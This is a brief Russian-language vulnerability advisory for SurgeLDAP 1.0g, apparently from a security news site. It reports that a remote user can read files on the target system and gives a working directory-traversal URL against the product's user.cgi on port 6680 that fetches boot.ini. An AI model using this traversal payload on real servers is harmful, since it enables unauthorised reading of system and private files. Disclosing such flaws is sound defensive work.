Программа: SurgeLDAP 1.0g 

Уязвимость обнаружена в SurgeLDAP. Удаленный пользователь может получить файлы на целевой системе. 

Пример: 

http://[host]:6680/user.cgi?cmd=show&page=/../../../boot.ini



Оставить мнение